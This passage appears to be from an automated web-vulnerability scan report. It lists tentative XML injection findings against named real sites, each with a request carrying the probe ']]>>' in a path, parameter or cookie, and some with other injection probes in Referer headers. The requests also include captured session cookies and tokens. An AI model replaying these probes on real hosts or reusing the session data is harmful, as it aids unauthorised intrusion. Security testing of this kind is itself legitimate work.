Content-Length: 1065


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.2. http://amch.questionmarket.com/adsc/d852149/4/864449/decide.php [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d852149/4/864449/decide.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adsc]]>>/d852149/4/864449/decide.php HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 17:50:21 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=929
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1065


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.3. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen]]>>/st.php HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 17:50:19 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=297
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1065


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.4. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/st.php]]>> HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 17:50:21 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=949
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1065


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.5. http://beacon.jump-time.net/jt.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://beacon.jump-time.net
Path:   /jt.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /jt.js]]>> HTTP/1.1
Host: beacon.jump-time.net
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F55C94ED4D496FCB
x-amz-id-2: j7IZdzHif9MWHZWPmA7QzUPNTESBHx6mW7kPTpbTPC1KkhLpKXrJe8ugl4eOagq+
Content-Type: application/xml
Date: Sun, 30 Jan 2011 01:41:46 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: acae02909e9941f48b2b7d9accc11e4d9dc109ed675ce971de7c52c61b60c666e71c858257a04206
Via: 1.0 24cd63caef97c959fcea23b44ee0f77c.cloudfront.net:11180 (CloudFront), 1.0 07a4270348f84154cfba6750f17515e7.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F55C94ED4D496FCB</RequestId><HostId>j7IZdzHif9MWHZWPmA7QzUPNTESBHx6mW7kPTpbTPC1KkhLpKX
...[SNIP]...

9.6. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [format parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-cms.scout.com
Path:   /feeds/analyticsfeed.ashx

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /feeds/analyticsfeed.ashx?page=http%3A//recruiting.scout.com/a.z%3Fs%3D73%26p%3D9%26c%3D4%27%26pid%3D88%26yr%3D2011&format=json]]>>&callback=$.analytics.report HTTP/1.1
Host: cdn-cms.scout.com
Proxy-Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1295040115.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=202704078.801620371.1294455998.1294851033.1295040115.3; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:42:03 GMT
Connection: close
Akamai: True
Content-Length: 388

<analyticsfeed xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><network>Scout</network><site>recruiting</site><sports/><categories/><pagetype>Recruiting</pagetype><pagesubtype/><author/><dateoverr
...[SNIP]...

9.7. http://cdn-forums.scout.com/adfeed.ashx [format parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-forums.scout.com
Path:   /adfeed.ashx

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adfeed.ashx?s=73&format=json]]>>&callback=$.showAd.cacheAdCodes HTTP/1.1
Host: cdn-forums.scout.com
Proxy-Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1295040115.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=202704078.801620371.1294455998.1294851033.1295040115.3; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Mbrd6
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Website-Assembly-Version: 2.21.0.0
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:42:14 GMT
Connection: close
Akamai: True
Content-Length: 455

<adFeed xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><ads><ad><code>SPTSN1</code><height>90</height><type>DISPLAY</type><width>728</width></ad><ad><code>SPTSN3</code><height>600</height><type>D
...[SNIP]...

9.8. http://edge.quantserve.com/quant.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://edge.quantserve.com
Path:   /quant.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /quant.js]]>> HTTP/1.1
Host: edge.quantserve.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EHAAG6ANq0itiBDbz6HJXbIAAboBAfYFgfQAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Sun, 30 Jan 2011 17:29:29 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.9. http://forums.silverlight.net/user/viewonline.aspx [CSAnonymous cookie]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The CSAnonymous cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the CSAnonymous cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3]]>>; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 147568
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:00:06 GMT; expires=Mon, 30-Jan-2012 16:00:06 GMT; path=/
Set-Cookie: CSAnonymous=321b38d0-d73f-4f68-b4d9-58e7580c96ff; expires=Sun, 30-Jan-2011 16:20:06 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:00:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/214911/508761.aspx">How to catch exceptions that occured in SOAP generated cs file (Reference.cs)? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

9.10. http://forums.silverlight.net/user/viewonline.aspx [CommunityServer-LastVisitUpdated-2101 cookie]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The CommunityServer-LastVisitUpdated-2101 cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the CommunityServer-LastVisitUpdated-2101 cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=]]>>; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 371633
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:50:02 GMT; expires=Mon, 30-Jan-2012 15:50:02 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:10:02 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:50:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/156518/352181.aspx">How to read XML file using System.XML.LINQ and loop through nodes? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

9.11. http://forums.silverlight.net/user/viewonline.aspx [omniID cookie]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The omniID cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the omniID cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a]]>>; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 334468
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:33:46 GMT; expires=Sun, 29-Jan-2012 23:33:46 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:53:46 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:33:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/18945/64900.aspx">Xml Parsing problem: Xml.Rearder.ReadToFollowing causes problem : The Official Microsoft Silverlight Site</a>
...[SNIP]...

9.12. http://forums.silverlight.net/user/viewonline.aspx [s_sq cookie]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The s_sq cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the s_sq cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA]]>>; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237293
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:28:23 GMT; expires=Sun, 29-Jan-2012 23:28:23 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:48:23 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:28:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
x">{System.InvalidOperationException: There was an error reflecting 'Exception'. ---&gt; System.InvalidOperationException: Namespace='http://xxxx.xxxx.net/xxxx/Xxxxx' is not supported with rpc\literal SOAP. The wrapper element has to be unqualified. : The Official Microsoft Silverlight Site</a>
...[SNIP]...

9.13. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [allowEmptySearch parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The allowEmptySearch parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the allowEmptySearch parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/Widgets/SearchBox.jss?appid=1000&scopeid=1&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true]]>>&focusOnInit=True&minimumTermLength=3 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 400 Bad Request
Content-Length: 1647
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB37
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 19:37:30 GMT
Connection: close
Vary: Accept-Encoding

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

9.14. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [appid parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The appid parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the appid parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/Widgets/SearchBox.jss?appid=1000]]>>&scopeid=1&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=True&minimumTermLength=3 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 400 Bad Request
Content-Length: 1647
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB38
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 19:37:20 GMT
Connection: close
Vary: Accept-Encoding

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

9.15. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [focusOnInit parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The focusOnInit parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the focusOnInit parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/Widgets/SearchBox.jss?appid=1000&scopeid=1&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=True]]>>&minimumTermLength=3 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 400 Bad Request
Content-Length: 1647
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
